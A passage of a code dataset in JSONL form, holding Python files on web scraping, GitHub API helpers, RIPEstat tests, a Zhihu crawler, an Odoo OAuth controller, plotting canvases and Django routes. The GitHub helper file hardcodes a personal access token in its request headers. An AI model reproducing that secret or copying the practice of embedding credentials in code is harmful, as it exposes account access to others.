value[tkey]:\n if isinstance(default[tkey], datetime):\n if not isinstance(value[tkey], datetime):\n dt = date_parse(value[tkey])\n value[tkey] = dt\n else:\n value[tkey] = type(default[tkey])(value[tkey])\n else:\n value[tkey] = default[tkey]\n super(BaseDocument, self).__init__(value)\n self.doc_type = self.__class__.__name__\n", "repo_name": "jagguli/stormbase", "sub_path": "stormbase/database/couchdb/document.py", "file_name": "document.py", "file_ext": "py", "file_size_in_byte": 985, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "corduroy.Document", "line_number": 5, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 17, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 18, "usage_type": "argument"}, {"api_name": "dateutil.parser.parse", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "13981736195", "text": "# Imports\nimport pandas as pd\nimport time\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport matplotlib.pyplot as plt\n\n# Creating web driver object\ndriver = webdriver.Chrome()\npage_url = \"https://harrypotter.fandom.com/wiki/Category:Character_indexes\"\ndriver.get(page_url)\n\n# Extracting data from web pages\n# Books\nfrom selenium.webdriver.common.by import By\nbooks = driver.find_elements(By.CLASS_NAME, 'category-page__member-link')\n\ntime.sleep(3)\n# Creating a dictionary of books and URLs\nbooks_url_dict = []\nfor category in books:\n book_url = category.get_attribute('href')\n book_name = category.text.replace(' (character index)','')\n books_url_dict.append({'book_name':book_name, 'url':book_url})\n#print(books_url_dict)\n\n# Extract characters\nchar_list_1 = []\nchar_list_2 = []\nfor i in range(0,len(books_url_dict)):\n if i in (0,5): # Part 1\n # for book in books_url_dict:\n #book+=books_url_dict[i]\n # go to book page\n driver.get(books_url_dict[i]['url'])\n\n char_elems = driver.find_elements(By.CLASS_NAME, 'article-table')\n for elem in char_elems:\n char_list_1.append({'book':books_url_dict[i]['book_name'],'character':elem.text})\n #print(char_list_1[0])\n if i in (1,2,3,4,6): # Part 2\n book = books_url_dict[i]\n # go to book page\n driver.get(book['url'])\n char_elems = driver.find_elements(By.XPATH, '//*[@id=\"mw-content-text\"]/div/ul')\n for elem in char_elems[:-2]:\n char_list_2.append({'book':book['book_name'],'character':elem.text})\n #print(char_list_2[0])\n\n# Converting the scrapped data into a DataFrame and Preprocessing\n# Converting names to lists\nfor i in char_list_1:\n i['character'] = i['character'].split('\\n')\n\nfor i in char_list_2:\n i['character'] = i['character'].split('\\n')\n\n# Creating Dataframes\n# char_list_1\ndf_1 = pd.DataFrame(char_list_1[0])\nfor i in range(1,len(char_list_1)):\n new = pd.DataFrame(char_list_1[i])\n df_1 = df_1.append(new)\n \n# char_list_2\ndf_2 = pd.DataFrame(char_list_2[0])\nfor i in range(1,len(char_list_2)):\n new = pd.DataFrame(char_list_2[i])\n df_2 = df_2.append(new)\n \ndf = df_1.append(df_2)\ndf.reset_index(drop=True, inplace=True)\n\n# Visualizing character counts in each book\n\ndf['book'].value_counts().plot(kind='bar')\nplt.show()\n\n# Export data to a csv file\ndf.to_csv('characters.csv',index=False)", "repo_name": "sruthi004/Character-Analysis-of-Harry-Potter-books-using-Spacy", "sub_path": "src/components/web_scraping.py", "file_name": "web_scraping.py", "file_ext": "py", "file_size_in_byte": 2442, 
"program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 9, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 9, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 16, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 16, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 18, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 37, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 37, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 45, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 45, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 60, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 62, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 66, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}]} +{"seq_id": "14027759400", "text": "import requests\nimport sys\nfrom static_variables import *\n\n\ndef get_data_collection_from_github_api(url):\n data = []\n while 1:\n response = get_response_from_github_api(url)\n json_response = response.json()\n data += json_response\n if LINK in response.headers:\n url = get_next_page_url(response.headers[LINK])\n else:\n url = None\n\n if url is None:\n break\n\n return data\n\n\ndef get_next_page_url(links):\n links = links.split(\", \")\n for link in links:\n ind = link.find('next')\n if ind != -1:\n return link[1:ind - 8]\n\n return None\n\n\ndef get_single_data_from_github_api(url):\n response = get_response_from_github_api(url)\n json_response = response.json()\n return json_response\n\n\ndef get_response_from_github_api(url):\n token = 'c1b10f829ce912233539e37dabc0e1fac7a516ca'\n headers = {'Authorization': 'token ' + token}\n\n response = requests.get(url, headers=headers)\n check_for_unexpected_response(response, url)\n\n return response\n\n\ndef check_for_unexpected_response(response, url):\n json_response = response.json()\n if MESSAGE in json_response:\n message = json_response[MESSAGE]\n if message.find(BAD_CREDENTIALS_MESSAGE) != -1:\n sys.exit(BAD_CREDENTIALS_MESSAGE)\n elif message.find(RATE_LIMIT_EXCEEDED_MESSAGE) != -1:\n sys.exit(RATE_LIMIT_EXCEEDED_MESSAGE)\n elif message.find(NOT_FOUND_MESSAGE) != -1:\n sys.exit(url + \" is \" + NOT_FOUND_MESSAGE)\n\n\ndef get_pr_reviewers(review_url):\n reviews_data = get_data_collection_from_github_api(review_url)\n unique_reviewers = set()\n for review in reviews_data:\n unique_reviewers.add(review[USER][LOGIN])\n reviewers = []\n for reviewer in unique_reviewers:\n user = {USER: reviewer}\n reviewers.append(user)\n return reviewers\n\n\ndef get_pr_commits(commits_url):\n commits_data = get_data_collection_from_github_api(commits_url)\n commits = []\n for commit_data in commits_data:\n commit = {SHA: commit_data[SHA], COMMITED_AT: commit_data[COMMIT][AUTHOR][DATE]}\n if commit_data[AUTHOR] is None:\n commit[AUTHOR] = commit_data[COMMIT][AUTHOR][NAME]\n else:\n commit[AUTHOR] = commit_data[AUTHOR][LOGIN]\n commits.append(commit)\n\n 
return commits\n\n\ndef get_pr_comments(pr_url):\n review_comments = get_review_comments(pr_url + \"/\" + REVIEWS)\n line_comments = get_line_comments(pr_url + \"/\" + COMMENTS)\n comments = review_comments + line_comments\n return comments\n\n\ndef get_review_comments(url):\n reviews = get_data_collection_from_github_api(url)\n\n review_comments = []\n for review in reviews:\n if review[BODY] and review[STATE] != PENDING:\n value = {USER: review[USER][LOGIN], BODY: review[BODY], SUBMITTED_AT: review[SUBMITTED_AT]}\n review_comments.append(value)\n\n return review_comments\n\n\ndef get_line_comments(url):\n comments = get_data_collection_from_github_api(url)\n line_comments = []\n for comment in comments:\n value = {USER: comment[USER][LOGIN], BODY: comment[BODY], SUBMITTED_AT: comment[UPDATED_AT]}\n line_comments.append(value)\n\n return line_comments\n\n\ndef get_changed_files(merge_commit_url):\n merge_commit_data = get_single_data_from_github_api(merge_commit_url)\n files_changed = []\n for file in merge_commit_data[FILES]:\n entry = {FILENAME: file[FILENAME], STATUS: file[STATUS], ADDITIONS: file[ADDITIONS], DELETIONS: file[DELETIONS]}\n files_changed.append(entry)\n\n return files_changed\n\n\ndef get_requested_reviewers(requested_reviewers):\n output = []\n for reviewer in requested_reviewers:\n user = {USER: reviewer[LOGIN]}\n output.append(user)\n return output\n\n\ndef get_merged_by(merged_by):\n if merged_by is None:\n return None\n else:\n return merged_by[LOGIN]\n", "repo_name": "sammarth-kapse/webhook_events", "sub_path": "helper_functions.py", "file_name": "helper_functions.py", "file_ext": "py", "file_size_in_byte": 3945, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 43, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 54, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 56, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "5443576657", "text": "\"\"\"Test prsw.api.looking_glass.\"\"\"\n\nimport pytest\nfrom datetime import datetime\nfrom typing import Iterable\nfrom unittest.mock import patch\n\nfrom .. 
import UnitTest\n\nfrom prsw.api import API_URL, Output\nfrom prsw.stat.looking_glass import LookingGlass\n\n\nclass TestLookingGlass(UnitTest):\n RESPONSE = {\n \"messages\": [],\n \"see_also\": [],\n \"version\": \"2.1\",\n \"data_call_status\": \"supported\",\n \"cached\": False,\n \"data\": {\n \"rrcs\": [\n {\n \"rrc\": \"RRC00\",\n \"location\": \"Amsterdam, Netherlands\",\n \"peers\": [\n {\n \"asn_origin\": \"1205\",\n \"as_path\": \"34854 6939 1853 1853 1205\",\n \"community\": \"34854:1009\",\n \"last_updated\": \"2021-04-15T08:21:07\",\n \"prefix\": \"140.78.0.0/16\",\n \"peer\": \"2.56.11.1\",\n \"origin\": \"IGP\",\n \"next_hop\": \"2.56.11.1\",\n \"latest_time\": \"2021-04-15T12:51:19\",\n },\n ],\n },\n ],\n \"query_time\": \"2021-04-15T12:51:22\",\n \"latest_time\": \"2021-04-15T12:51:04\",\n \"parameters\": {\"resource\": \"140.78.0.0/16\"},\n },\n \"query_id\": \"20210415125122-96ed15ff-31d8-41b9-b1d0-d0c3f293f0c1\",\n \"process_time\": 79,\n \"server_id\": \"app114\",\n \"build_version\": \"live.2021.4.14.157\",\n \"status\": \"ok\",\n \"status_code\": 200,\n \"time\": \"2021-04-15T12:45:22.211516\",\n }\n\n def setup_method(self):\n url = f\"{API_URL}{LookingGlass.PATH}data.json?resource=140.78.0.0/16\"\n\n self.api_response = Output(url, **TestLookingGlass.RESPONSE)\n self.params = {\n \"preferred_version\": LookingGlass.VERSION,\n \"resource\": \"140.78.0.0/16\",\n }\n\n return super().setup_method()\n\n @pytest.fixture(scope=\"session\")\n def mock_get(self):\n self.setup_method()\n\n with patch.object(self.ripestat, \"_get\") as mocked_get:\n mocked_get.return_value = self.api_response\n\n yield self\n\n mocked_get.assert_called_with(LookingGlass.PATH, self.params)\n\n def test__init__valid_resource(self, mock_get):\n response = LookingGlass(mock_get.ripestat, resource=self.params[\"resource\"])\n assert isinstance(response, LookingGlass)\n\n def test__init__invalid_resource(self):\n with pytest.raises(ValueError):\n LookingGlass(self.ripestat, resource=\"invalid-prefix\")\n\n def test__getitem__(self, mock_get):\n response = LookingGlass(mock_get.ripestat, resource=self.params[\"resource\"])\n assert isinstance(response[\"RRC00\"], tuple) # namedtuple: RRC by RRC key\n\n def test__iter__(self, mock_get):\n response = LookingGlass(mock_get.ripestat, resource=self.params[\"resource\"])\n assert isinstance(response, Iterable)\n\n def test__len__(self, mock_get):\n response = LookingGlass(mock_get.ripestat, resource=self.params[\"resource\"])\n assert len(response) == len(TestLookingGlass.RESPONSE[\"data\"][\"rrcs\"])\n\n def test_objectify_rrcs(self, mock_get):\n response = LookingGlass(mock_get.ripestat, resource=self.params[\"resource\"])\n\n for collector in response:\n assert isinstance(collector, tuple) # namedtuple: RRC\n assert \"rrc\" in collector.__dir__()\n assert \"location\" in collector.__dir__()\n assert \"peers\" in collector.__dir__()\n\n for peer in collector.peers:\n assert isinstance(peer, tuple) # namedtuple: Peer\n assert \"asn_origin\" in peer.__dir__()\n assert \"as_path\" in peer.__dir__()\n assert \"community\" in peer.__dir__()\n assert \"last_updated\" in peer.__dir__()\n assert \"prefix\" in peer.__dir__()\n assert \"peer\" in peer.__dir__()\n assert \"origin\" in peer.__dir__()\n assert \"next_hop\" in peer.__dir__()\n assert \"latest_time\" in peer.__dir__()\n\n def test_latest_time(self, mock_get):\n response = LookingGlass(mock_get.ripestat, resource=self.params[\"resource\"])\n\n latest_time = 
TestLookingGlass.RESPONSE[\"data\"][\"latest_time\"]\n assert response.latest_time == datetime.fromisoformat(latest_time)\n\n def test_query_time(self, mock_get):\n response = LookingGlass(mock_get.ripestat, resource=self.params[\"resource\"])\n\n time = TestLookingGlass.RESPONSE[\"data\"][\"query_time\"]\n assert response.query_time == datetime.fromisoformat(time)\n\n def test_peers(self, mock_get):\n response = LookingGlass(mock_get.ripestat, resource=self.params[\"resource\"])\n\n assert isinstance(response.peers, list)\n\n for peer in response.peers:\n assert isinstance(peer, tuple) # namedtuple: Peer\n\n def test_rrcs(self, mock_get):\n response = LookingGlass(mock_get.ripestat, resource=self.params[\"resource\"])\n\n assert isinstance(response.rrcs, dict)\n\n for name, route_server in response.rrcs.items():\n assert isinstance(name, str) # RRC name: 'RRC00'\n assert isinstance(route_server, tuple) # namedtuple: RRC\n", "repo_name": "jvoss/prsw", "sub_path": "tests/unit/stat/test_looking_glass.py", "file_name": "test_looking_glass.py", "file_ext": "py", "file_size_in_byte": 5401, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "52", "api": [{"api_name": "prsw.api.API_URL", "line_number": 55, "usage_type": "name"}, {"api_name": "prsw.stat.looking_glass.LookingGlass.PATH", "line_number": 55, "usage_type": "attribute"}, {"api_name": "prsw.stat.looking_glass.LookingGlass", "line_number": 55, "usage_type": "name"}, {"api_name": "prsw.api.Output", "line_number": 57, "usage_type": "call"}, {"api_name": "prsw.stat.looking_glass.LookingGlass.VERSION", "line_number": 59, "usage_type": "attribute"}, {"api_name": "prsw.stat.looking_glass.LookingGlass", "line_number": 59, "usage_type": "name"}, {"api_name": "unittest.mock.patch.object", "line_number": 69, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 69, "usage_type": "name"}, {"api_name": "prsw.stat.looking_glass.LookingGlass.PATH", "line_number": 74, "usage_type": "attribute"}, {"api_name": "prsw.stat.looking_glass.LookingGlass", "line_number": 74, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 65, "usage_type": "call"}, {"api_name": "prsw.stat.looking_glass.LookingGlass", "line_number": 77, "usage_type": "call"}, {"api_name": "prsw.stat.looking_glass.LookingGlass", "line_number": 78, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 81, "usage_type": "call"}, {"api_name": "prsw.stat.looking_glass.LookingGlass", "line_number": 82, "usage_type": "call"}, {"api_name": "prsw.stat.looking_glass.LookingGlass", "line_number": 85, "usage_type": "call"}, {"api_name": "prsw.stat.looking_glass.LookingGlass", "line_number": 89, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 90, "usage_type": "argument"}, {"api_name": "prsw.stat.looking_glass.LookingGlass", "line_number": 93, "usage_type": "call"}, {"api_name": "prsw.stat.looking_glass.LookingGlass", "line_number": 97, "usage_type": "call"}, {"api_name": "prsw.stat.looking_glass.LookingGlass", "line_number": 118, "usage_type": "call"}, {"api_name": "datetime.datetime.fromisoformat", "line_number": 121, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 121, "usage_type": "name"}, {"api_name": "prsw.stat.looking_glass.LookingGlass", "line_number": 124, "usage_type": "call"}, {"api_name": "datetime.datetime.fromisoformat", "line_number": 127, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 127, "usage_type": "name"}, 
{"api_name": "prsw.stat.looking_glass.LookingGlass", "line_number": 130, "usage_type": "call"}, {"api_name": "prsw.stat.looking_glass.LookingGlass", "line_number": 138, "usage_type": "call"}]} +{"seq_id": "73376455205", "text": "from __future__ import unicode_literals, print_function\nfrom RedisQueue import RedisQueue\nfrom zhihu_oauth import ZhihuClient, Answer, Article\nimport datetime\nimport time\nimport random\nimport sys\nfrom timeout import timeout\nimport os\nfrom utils import print_err\nfrom pymongo import MongoClient\n\nMAX_SLEEP_TIME = 15\nCookies_File = './cookies/cookies%s.json' % sys.argv[1]\nglobal client\nclient = ZhihuClient()\nif os.path.isfile(Cookies_File):\n client.load_token(Cookies_File)\nelse:\n client_info = open('./cookies/client_info_list.data').readlines()\n client_info = client_info[int(sys.argv[1])].strip().split('\\t')\n client.login_in_terminal(client_info[0], client_info[1])\n client.save_token(Cookies_File)\n\n\ndef get_user_collections(uname):\n global client\n if uname == '':\n return\n print(uname)\n\n user_collections = dict()\n try:\n people = client.people(uname)\n user_collections['_id'] = uname\n user_collections['owner'] = uname\n user_collections['collections'] = dict()\n for collection in people.collections:\n user_collections['collections'][collection.title] = []\n for content in collection.contents:\n c_id = content.id\n q_id = -1\n if isinstance(content, Answer):\n title = content.question.title\n q_id = content.question.id\n elif isinstance(content, Article):\n title = content.title\n user_collections['collections'][collection.title].append({\n 'id': c_id,\n 'q_id': q_id,\n 'title': title,\n #'detail': q.detail,\n })\n except Exception as e:\n print_err(e)\n print_err(uname)\n ferr = open('./err.out', 'a')\n ferr.write(uname + '\\n')\n print_err(\"Something wrong when try to get user's collections\")\n time.sleep(random.uniform(0, 5))\n\n return user_collections\n\n\nif __name__ == '__main__':\n q = RedisQueue('answer_queue')\n sleep_time = 0\n db = MongoClient().zhihu.zhihu_collections\n while 1:\n if (q.empty()):\n print('Finished at %s' % str(datetime.datetime.now()))\n print('Waiting ...')\n uname = q.get()\n try:\n uname = uname.decode()\n except:\n continue\n if db.find({'_id': uname}).count() > 0:\n continue\n\n try:\n with timeout(seconds=40):\n all_collections = get_user_collections(uname)\n if all_collections == {}:\n continue\n elif all_collections is None:\n sleep_time += random.uniform(1, 5)\n print_err('Sleeping for %0.2f seconds' % sleep_time)\n time.sleep(sleep_time)\n else:\n db.insert(all_collections)\n sleep_time -= 1\n sleep_time = max(0, sleep_time)\n time.sleep(random.uniform(1, 3))\n except TimeoutError:\n print_err('Timeout!')\n sleep_time += random.uniform(1, 5)\n print_err('Sleeping for %0.2f seconds' % sleep_time)\n time.sleep(sleep_time)\n except Exception as e:\n print_err('Unknown exception!!')\n print_err(e)\n if sleep_time > MAX_SLEEP_TIME:\n # refresh the client\n print_err('Refresh client!')\n client = ZhihuClient(Cookies_File)\n sleep_time = 0\n print('Done')\n", "repo_name": "Adoni/ZhihuCrawler", "sub_path": "user_collections.py", "file_name": "user_collections.py", "file_ext": "py", "file_size_in_byte": 3589, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.argv", "line_number": 14, "usage_type": "attribute"}, {"api_name": "zhihu_oauth.ZhihuClient", "line_number": 16, "usage_type": "call"}, {"api_name": 
"os.path.isfile", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 21, "usage_type": "attribute"}, {"api_name": "zhihu_oauth.Answer", "line_number": 43, "usage_type": "argument"}, {"api_name": "zhihu_oauth.Article", "line_number": 46, "usage_type": "argument"}, {"api_name": "utils.print_err", "line_number": 55, "usage_type": "call"}, {"api_name": "utils.print_err", "line_number": 56, "usage_type": "call"}, {"api_name": "utils.print_err", "line_number": 59, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 60, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 60, "usage_type": "call"}, {"api_name": "RedisQueue.RedisQueue", "line_number": 66, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 68, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 71, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 71, "usage_type": "attribute"}, {"api_name": "timeout.timeout", "line_number": 82, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 87, "usage_type": "call"}, {"api_name": "utils.print_err", "line_number": 88, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 89, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 94, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 94, "usage_type": "call"}, {"api_name": "utils.print_err", "line_number": 96, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 97, "usage_type": "call"}, {"api_name": "utils.print_err", "line_number": 98, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 99, "usage_type": "call"}, {"api_name": "utils.print_err", "line_number": 101, "usage_type": "call"}, {"api_name": "utils.print_err", "line_number": 102, "usage_type": "call"}, {"api_name": "utils.print_err", "line_number": 105, "usage_type": "call"}, {"api_name": "zhihu_oauth.ZhihuClient", "line_number": 106, "usage_type": "call"}]} +{"seq_id": "40477041827", "text": "import datetime\nimport requests\nfrom odoo import http, _\nfrom odoo.exceptions import UserError\n\n\nclass GoogleTaskAuth(http.Controller):\n \"\"\"Controller for Google Task Authentication\"\"\"\n @http.route('/google_task_authentication', type=\"http\", auth=\"public\",\n website=True)\n def get_auth_code(self, **kw):\n \"\"\"Get the authentication code from Google and save access tokens\"\"\"\n project_cred = http.request.env.ref(\n 'odoo_google_tasks_integration.project_google_credential_data')\n if kw.get('code'):\n project_cred.write(\n {'hangout_company_authorization_code': kw.get('code')})\n data = {\n 'code': kw.get('code'),\n 'client_id':project_cred.hangout_client,\n 'client_secret': project_cred.hangout_client_secret,\n 'redirect_uri': project_cred.hangout_redirect_uri,\n 'grant_type': 'authorization_code'\n }\n response = requests.post(\n 'https://accounts.google.com/o/oauth2/token',\n data=data,\n headers={'content-type': 'application/x-www-form-urlencoded'})\n if response.json() and response.json().get('access_token'):\n project_cred.write({\n 'hangout_company_access_token': response.json().get(\n 'access_token'),\n 'hangout_company_access_token_expiry':\n datetime.datetime.now() + datetime.timedelta(\n seconds=response.json().get('expires_in')),\n 'hangout_company_refresh_token': response.json().get(\n 'access_token'),\n })\n return \"Authentication Success. 
You can close this window.\"\n else:\n raise UserError(\n _('Something went wrong during the token generation.'\n 'Maybe your Authorization Code is invalid')\n )\n", "repo_name": "CybroOdoo/CybroAddons", "sub_path": "odoo_google_tasks_integration/controllers/odoo_google_tasks_integration.py", "file_name": "odoo_google_tasks_integration.py", "file_ext": "py", "file_size_in_byte": 2025, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 204, "dataset": "github-code", "pt": "52", "api": [{"api_name": "odoo.http.Controller", "line_number": 7, "usage_type": "attribute"}, {"api_name": "odoo.http", "line_number": 7, "usage_type": "name"}, {"api_name": "odoo.http.request.env.ref", "line_number": 13, "usage_type": "call"}, {"api_name": "odoo.http.request", "line_number": 13, "usage_type": "attribute"}, {"api_name": "odoo.http", "line_number": 13, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 34, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 34, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 34, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 41, "usage_type": "call"}, {"api_name": "odoo._", "line_number": 42, "usage_type": "call"}, {"api_name": "odoo.http.route", "line_number": 9, "usage_type": "call"}, {"api_name": "odoo.http", "line_number": 9, "usage_type": "name"}]} +{"seq_id": "16314046891", "text": "from matplotlib.figure import Figure\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as Canvas\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\n\nimport matplotlib\nmatplotlib.use('Qt5Agg')\n\n\nclass Canvas3D(Canvas):\n def __init__(self):\n self.fig = plt.figure()\n Canvas.__init__(self, self.fig)\n self.axes = self.fig.gca(projection='3d')\n\n def drawGraph(self, x, t, C): # Fun for Graph plotting\n x, t = np.meshgrid(x, t)\n self.axes.clear()\n # plots the 3D surface plot\n surf = self.axes.plot_surface(x, t, C, cmap='jet')\n self.axes.set_xlabel('Space (cm)')\n self.axes.set_ylabel('Time (s)')\n self.axes.set_zlabel('Concentration')\n self.fig.colorbar(surf, shrink=0.5, aspect=5)\n self.draw_idle()\n\n\nclass Canvas2D(Canvas):\n def __init__(self):\n self.fig = plt.figure(tight_layout=True)\n Canvas.__init__(self, self.fig) # creating FigureCanvas\n self.axes = self.fig.gca()\n\n def drawGraph(self, x, t, C, userTimeInput=list()):\n self.axes.clear()\n\n if userTimeInput:\n userInput = list(userTimeInput)\n idx_userInput = 0\n counter = 0\n colCount = 4\n for idx, n in enumerate(t):\n if t[idx] == userInput[idx_userInput]:\n self.axes.plot(x, C[idx, :], label=f'$t={int(t[idx])}\\ s$')\n idx_userInput += 1\n counter += 1\n if idx_userInput == len(userInput):\n break\n if counter//colCount == 0:\n counter = colCount\n if len(userInput) <= 12:\n self.axes.legend(\n prop={'size': 6}, loc='upper left', bbox_to_anchor=(1.04, 1))\n elif len(userInput) > 12:\n self.axes.legend(\n ncol=counter//colCount, prop={'size': 6}, loc='lower right', bbox_to_anchor=(1, 0))\n\n else:\n counter = 0\n for idx, n in enumerate(t):\n if t[idx] % 1 == 0 and t[idx] > 0:\n self.axes.plot(x, C[idx, :], label=f'$t={int(t[idx])}\\ s$')\n counter += 1\n if counter//5 == 0:\n counter = 5\n if counter <= 6:\n self.axes.legend(ncol=counter//5)\n self.axes.set_xlabel('Space (cm)')\n self.axes.set_ylabel('Time (s)')\n self.draw_idle()\n\n def 
clearGraph(self):\n self.axes.clear()\n self.draw_idle()\n", "repo_name": "will004/air-pollution-skripsi", "sub_path": "ui/outputs/canvas.py", "file_name": "canvas.py", "file_ext": "py", "file_size_in_byte": 2572, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.use", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_qt5agg.FigureCanvasQTAgg", "line_number": 11, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_qt5agg.FigureCanvasQTAgg.__init__", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_qt5agg.FigureCanvasQTAgg", "line_number": 14, "usage_type": "name"}, {"api_name": "numpy.meshgrid", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_qt5agg.FigureCanvasQTAgg", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_qt5agg.FigureCanvasQTAgg.__init__", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_qt5agg.FigureCanvasQTAgg", "line_number": 32, "usage_type": "name"}]} +{"seq_id": "33936503377", "text": "\"\"\"service_catalog URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.urls import include, path\nfrom django.contrib import admin\nfrom .api import router\nfrom app1 import views\nfrom app1.api_views import *\nfrom rest_framework_jwt.views import obtain_jwt_token, refresh_jwt_token\nfrom rest_framework.authtoken.views import ObtainAuthToken\n\nadmin.site.site_title = 'Service metrics'\n\nurlpatterns = [\n\n url(r'^admin/', admin.site.urls),\n\n url(r'^idealweight/',views.IdealWeight),\n\n path(r'api/v1/', include(router.urls)),\n\n path('staff/', StaffView.as_view()),\n\n path('api/portfolios/', PortfolioView.as_view()),\n\n path('api/subportfolios/', PortSubPort.as_view()),\n\n path('api/subportfolios/', SubPortfolioView.as_view()),\n\n path('api/services/', ServiceView.as_view()),\n\n path('api/services/', SubPortService.as_view()),\n\n path('api/services//', ServiceView.as_view()),\n\n path('api/metrics/', MetricView.as_view()),\n\n path('api/metric_values/', MetricValueView.as_view()),\n\n path('api/users/', UserViewSet.as_view()),\n\n url(r'', admin.site.urls),\n\n path(r'api-token-auth/', obtain_jwt_token),\n\n path(r'api-token-refresh/', refresh_jwt_token),\n\n path(r'auth/', ObtainAuthToken.as_view())\n\n\n]\n", "repo_name": "roman1005/servmet", "sub_path": "service_catalog/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1896, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.contrib.admin.site", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 25, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 29, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 29, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 29, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 31, "usage_type": "call"}, {"api_name": "app1.views.IdealWeight", "line_number": 31, "usage_type": "attribute"}, {"api_name": "app1.views", "line_number": 31, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 33, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 33, "usage_type": "call"}, {"api_name": "api.router.urls", "line_number": 33, "usage_type": "attribute"}, {"api_name": "api.router", "line_number": 33, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 35, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 37, "usage_type": "call"}, 